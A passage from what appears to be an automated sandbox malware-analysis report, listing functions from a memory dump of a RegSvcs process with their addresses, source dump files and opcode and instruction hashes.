                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4952c57564912bb5268c5947f294fbc32cedfbbd47cb9f72658ddf927187c625
                                                                                                                              • Instruction ID: 01f4042577de109676b90dd61fc0600ec28022d87dcd1820f7cc367dccbb50d9
                                                                                                                              • Opcode Fuzzy Hash: 4952c57564912bb5268c5947f294fbc32cedfbbd47cb9f72658ddf927187c625
                                                                                                                              • Instruction Fuzzy Hash: 861104326001469FC301CF28E810BA2BBB9FB5A314F09815EE948DF325D732EC85CBA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014EC810 Relevance: .0, Instructions: 50COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: bb5809204c73f2891c30c4f4779fda91b8af1c54146a5a107bf84ea7a71d52d4
                                                                                                                              • Instruction ID: c82162e3f9153ac7841d2024655230815b2e763013e52d078926529855eea3e4
                                                                                                                              • Opcode Fuzzy Hash: bb5809204c73f2891c30c4f4779fda91b8af1c54146a5a107bf84ea7a71d52d4
                                                                                                                              • Instruction Fuzzy Hash: 64111CB1A002099BCB00DF9AD585A9EB7F4FF58350F15406AA905E7351D674EA018BA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0150EA60 Relevance: .0, Instructions: 50COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: fa14a9e3b6440ed580091a68daea902f55eb2c5a17d1c3d0284d3f1fb6743e01
                                                                                                                              • Instruction ID: 320976de10c05e26be5a86dfab85e89e4a06bf7689daa21dd6ae6b07fd460ea8
                                                                                                                              • Opcode Fuzzy Hash: fa14a9e3b6440ed580091a68daea902f55eb2c5a17d1c3d0284d3f1fb6743e01
                                                                                                                              • Instruction Fuzzy Hash: 1F01F1315402119FC733AA6A8409D6ABBAAFF65690B244C2FE5151F6A0CBB09C81CB91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0145C020 Relevance: .0, Instructions: 49COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                              • Instruction ID: 24eef12c813f0ae61019534eff674bc38e9067393b8c734a918b5227e89eb093
                                                                                                                              • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                              • Instruction Fuzzy Hash: 840128325007059FEF22DAAAC880EA777EDFFD6614F04485FE9468B660DA70E402CB60
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014A20F0 Relevance: .0, Instructions: 49COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 333487291392bd86cd494a66683dadaf16a59cc5434154f0ac3030e3bdc75890
                                                                                                                              • Instruction ID: d8ec08e63057da458ed8b16f5e59bde8bd2e6ba21d85ee1493e376266e7e02de
                                                                                                                              • Opcode Fuzzy Hash: 333487291392bd86cd494a66683dadaf16a59cc5434154f0ac3030e3bdc75890
                                                                                                                              • Instruction Fuzzy Hash: B511A975A0020DABCF01EFA4C850EAE7BB5EB64340F01405AE9119B2A0DB30AE02DB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0149E5CF Relevance: .0, Instructions: 49COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 3ad51432ec9eb4808ba2aa5eae08770654890ef194ce0457518e4cdd1eb0f22d
                                                                                                                              • Instruction ID: 999687d7b3a35d4cfe8b8e388d58abe54e574452bf3eed54434d5c586d66fd15
                                                                                                                              • Opcode Fuzzy Hash: 3ad51432ec9eb4808ba2aa5eae08770654890ef194ce0457518e4cdd1eb0f22d
                                                                                                                              • Instruction Fuzzy Hash: 29018472201951BFD711AB7ACD44E97BBACFBA4664700062FB50597671DB74EC01C6A0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014F69C0 Relevance: .0, Instructions: 49COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ab1564534364662a8a5a0757d11ac094299b88960093aefde0977270102e9636
                                                                                                                              • Instruction ID: 30487541a9e44cdf33d1114669086a5f79f65ace81d7c8b1621a5cfa4f35bf28
                                                                                                                              • Opcode Fuzzy Hash: ab1564534364662a8a5a0757d11ac094299b88960093aefde0977270102e9636
                                                                                                                              • Instruction Fuzzy Hash: E201F0327143019BD320DF6AD4489A7FBA8FF55660F52411FF96987390E7309905CBD1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014EC460 Relevance: .0, Instructions: 48COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5a73527eef3ff5fc43110ee165016cd5a3b5cb78e5142f1a906808c0bdb524b5
                                                                                                                              • Instruction ID: e4395050c7c081ad36b85cf22f98650b168a1212877179256b57dbbeb5c1e10d
                                                                                                                              • Opcode Fuzzy Hash: 5a73527eef3ff5fc43110ee165016cd5a3b5cb78e5142f1a906808c0bdb524b5
                                                                                                                              • Instruction Fuzzy Hash: 0D115B75A00209ABDB15EF69C884EAE7BB6EB58340F01406AF90197360DB34EA11DB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014EC97C Relevance: .0, Instructions: 48COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0b76ae5f65e91f0c0d33b4edd7db763d3b5571e101db8c6ddbd288d10ac43ca6
                                                                                                                              • Instruction ID: 23cbe67a0e09529d7b93171cc435ac8d0032d48dbc0d841ef42b1ffe74910d6c
                                                                                                                              • Opcode Fuzzy Hash: 0b76ae5f65e91f0c0d33b4edd7db763d3b5571e101db8c6ddbd288d10ac43ca6
                                                                                                                              • Instruction Fuzzy Hash: C11179B16083089FC700DF6AC44599BBBE4EFA8310F00451FB998D73A1E630E901CB92
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014ECA11 Relevance: .0, Instructions: 48COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c28f12b4832ef717f3693ce096f50303c1414ec1ba9ebb11e673e4b159e1f5cd
                                                                                                                              • Instruction ID: fbdfd9ff26ec9fe4298e36b816ce4190d1ca6e16ce7a8c842c2c3a62f779756a
                                                                                                                              • Opcode Fuzzy Hash: c28f12b4832ef717f3693ce096f50303c1414ec1ba9ebb11e673e4b159e1f5cd
                                                                                                                              • Instruction Fuzzy Hash: CB1179B16083089FC310DF6AC445A8BBBE4FFA9350F00851FB958D73A0E630E901CB92
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0147E016 Relevance: .0, Instructions: 46COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                              • Instruction ID: 035896ec9acf2215002a08371fc40b3142c782909bfb46db75b6f5222aa83023
                                                                                                                              • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                              • Instruction Fuzzy Hash: C4017CB22015C09FE323861DC948FA77BE8EB5A758F0904A7FA05DB7B2D678DC41C661
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0145826B Relevance: .0, Instructions: 46COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: bb6ae5878197588053d523413cead19a3d7250aba1509dd8051cc666dbc90ae0
                                                                                                                              • Instruction ID: e219182c4403d197c5fc4f6d3af9b85a1dce05c23187db130cf59a4497d72729
                                                                                                                              • Opcode Fuzzy Hash: bb6ae5878197588053d523413cead19a3d7250aba1509dd8051cc666dbc90ae0
                                                                                                                              • Instruction Fuzzy Hash: CD01D4317006069BE754DB6BD8149AF7BE9FF90690B06402BAD01EB765DE70D901C691
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0150EB50 Relevance: .0, Instructions: 46COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 72bf5ec9a58f228e3073d4e1a9003308d333318f7e58ecdda86164d61117b5ca
                                                                                                                              • Instruction ID: 46fd68ffa5cc5e5d564d787e54f578f2ee23d0243fda81f4af398e062c836f4f
                                                                                                                              • Opcode Fuzzy Hash: 72bf5ec9a58f228e3073d4e1a9003308d333318f7e58ecdda86164d61117b5ca
                                                                                                                              • Instruction Fuzzy Hash: CC01A771640701AFD3325B56D851F46BBA8FF65B90F114C2FB6099F7E0D6B0D8418B94
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01462582 Relevance: .0, Instructions: 45COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2522908d7f7598ea0067c0348ef797dddb9d82bde12456c55aed290b20dc83aa
                                                                                                                              • Instruction ID: 738031537ebc128df56e8c4daae3ecae2b2a046618b95ac3f4c2157357d92d94
                                                                                                                              • Opcode Fuzzy Hash: 2522908d7f7598ea0067c0348ef797dddb9d82bde12456c55aed290b20dc83aa
                                                                                                                              • Instruction Fuzzy Hash: 67F0F932741610BBC7319F578C40F877EADEB94B94F00442EA60A97620C670ED01C7A1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0148C073 Relevance: .0, Instructions: 43COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                              • Instruction ID: 971d9414b3c544a41643cfe3d0068577a7c5bec5c3def23b10cade401cb6756d
                                                                                                                              • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                              • Instruction Fuzzy Hash: 0CF0C2F2600611ABD324DF8EDC40E97FBEEDBE1A90F058529A645CB320EA31DD05CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0153634F Relevance: .0, Instructions: 43COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c5081c8b864f3888504fed7f9863c2d8a1acc7bbcce97e28b3f9a1f96af05fe7
                                                                                                                              • Instruction ID: 50c056683228ff26365f5c5e640669f71d9538825d4a46c6037025576d70c65b
                                                                                                                              • Opcode Fuzzy Hash: c5081c8b864f3888504fed7f9863c2d8a1acc7bbcce97e28b3f9a1f96af05fe7
                                                                                                                              • Instruction Fuzzy Hash: B6014471A10209EFDB04DFA9D55199EB7F8FF58304F15405EF914EB350D7749A019BA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0145C310 Relevance: .0, Instructions: 43COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                              • Instruction ID: 085338c9421c196586a55926c4b5d56cba5c2079f572ad31fb2e9d693bddbee6
                                                                                                                              • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                              • Instruction Fuzzy Hash: AAF0F2731047239BD7721B9A44C0B6B669D8FE1A64F150037EA0557263C9718D0296D1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0153625D Relevance: .0, Instructions: 43COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 52490820a5f77caaa1530b1de51f9eaadde343a93507df035ac77628715b6e20
                                                                                                                              • Instruction ID: d94d8701ba54293329a6dc1079a50e6015017a7854e334568342dae93d392d38
                                                                                                                              • Opcode Fuzzy Hash: 52490820a5f77caaa1530b1de51f9eaadde343a93507df035ac77628715b6e20
                                                                                                                              • Instruction Fuzzy Hash: 7F018471A00209EFCB04DFA9D4519AEB7F8FF68300F11405AF904EB351D774AA01CBA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 015362D6 Relevance: .0, Instructions: 43COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8626a26a5a54c8f588860d97b5cc4883b70cf2ea3d9229b4d565dbe495a9a8bb
                                                                                                                              • Instruction ID: 51b5e0864f9082577b26c189e619c8a7e5d31d25d87bc48e60a29675d2b47eea
                                                                                                                              • Opcode Fuzzy Hash: 8626a26a5a54c8f588860d97b5cc4883b70cf2ea3d9229b4d565dbe495a9a8bb
                                                                                                                              • Instruction Fuzzy Hash: 390184B1A00209EFDB00DFA9D4419AEB7F8FF58300F51405AF914EB350D7749E018BA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0149CA6F Relevance: .0, Instructions: 42COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                                              • Instruction ID: b0af05ebdbc0c6e6c4942c97dcfe157b0f5e19645e708406c49550c547172f84
                                                                                                                              • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                                              • Instruction Fuzzy Hash: C901F4322006869BEB22D75DC849FAABFD8EF51750F0840BBFA048B7B1E778C801C211
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 015361E5 Relevance: .0, Instructions: 41COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2db87d6ad216006333973a270585705c825e145be2eb9a900fb18dc540f23ae9
                                                                                                                              • Instruction ID: a02e03aaeb92adfa45524e6b8378dd5f032fccfca162e045aafe7a8eca7d93a4
                                                                                                                              • Opcode Fuzzy Hash: 2db87d6ad216006333973a270585705c825e145be2eb9a900fb18dc540f23ae9
                                                                                                                              • Instruction Fuzzy Hash: 2D018F71A00249ABDB00DFAAD445AEEBBF8BF68310F15005EF500AB290D774EA01CBA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014EA4B0 Relevance: .0, Instructions: 40COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b29de61896fe53e9c52cff301623c9d2c620a11fa110f6910f53b9871f42b4fa
                                                                                                                              • Instruction ID: 781a7ddc2d9365dac0422348469e9986e07685118027d7c10357947764834955
                                                                                                                              • Opcode Fuzzy Hash: b29de61896fe53e9c52cff301623c9d2c620a11fa110f6910f53b9871f42b4fa
                                                                                                                              • Instruction Fuzzy Hash: F7018936110219ABCF129E94D844EDA3FA6FB4C655F068116FE186A220C336D971EB91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0145C0F0 Relevance: .0, Instructions: 39COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 34ff34f9b49ad93d69593ca248e7a4f748417700a94f79feda43bde591ce5105
                                                                                                                              • Instruction ID: 941bf7645ea1e95ded927858fa783df7050db007f5a28dace6a1a7fbc8aca86d
                                                                                                                              • Opcode Fuzzy Hash: 34ff34f9b49ad93d69593ca248e7a4f748417700a94f79feda43bde591ce5105
                                                                                                                              • Instruction Fuzzy Hash: 46F02BB23043415BF39495198C81F23369DE7D4651F25802BEF058B7F3EA70DC018B94
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0149656A Relevance: .0, Instructions: 39COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c64a10f87da4a9eca54dd0269a3a0ca069e1ed0a573a360a6256cc665a07323a
                                                                                                                              • Instruction ID: a2adde1cc93455cce2fce348d1bf08689eef4d62fa02785aff84b360b0bbcd30
                                                                                                                              • Opcode Fuzzy Hash: c64a10f87da4a9eca54dd0269a3a0ca069e1ed0a573a360a6256cc665a07323a
                                                                                                                              • Instruction Fuzzy Hash: 4E01A4703007819BFB229B2DDD58F263BA4BB50B50F4A0596BA118BBF6EB78D4028610
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0150437C Relevance: .0, Instructions: 37COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                              • Instruction ID: 8bdda86d0b54490e9bfa68bbeb86a97362c16e72fe8656b2aa464d0a301c4b9b
                                                                                                                              • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                              • Instruction Fuzzy Hash: 23F0E935341D1347EB37AAAE9420B6EAB96BFA0910B15252D9701CF6D0DF60D8808780
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014EE872 Relevance: .0, Instructions: 36COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                              • Instruction ID: aa055c1037a52f6126552f5f4a91d1d261d748d8d78f9a8d909de038c27758a5
                                                                                                                              • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                              • Instruction Fuzzy Hash: F8F03A336116129BE3319A5EC884F17B7A8BFA5A61F59016AA608AB274C670EC029790
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014EC89D Relevance: .0, Instructions: 36COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d21223c05c2c3b9c7e6529ec3404b8d1db542e148d59c751e5a3d1f9f0839099
                                                                                                                              • Instruction ID: 9330640c8ad8451af9e6e24568ae2de36861a2c36d0fe8d1533b4617096ff3f3
                                                                                                                              • Opcode Fuzzy Hash: d21223c05c2c3b9c7e6529ec3404b8d1db542e148d59c751e5a3d1f9f0839099
                                                                                                                              • Instruction Fuzzy Hash: 67F08C706097049FC310EF29C945A1AB7E4FFA8710F85465EB898DB3A4E634EA01C796
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01490854 Relevance: .0, Instructions: 35COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
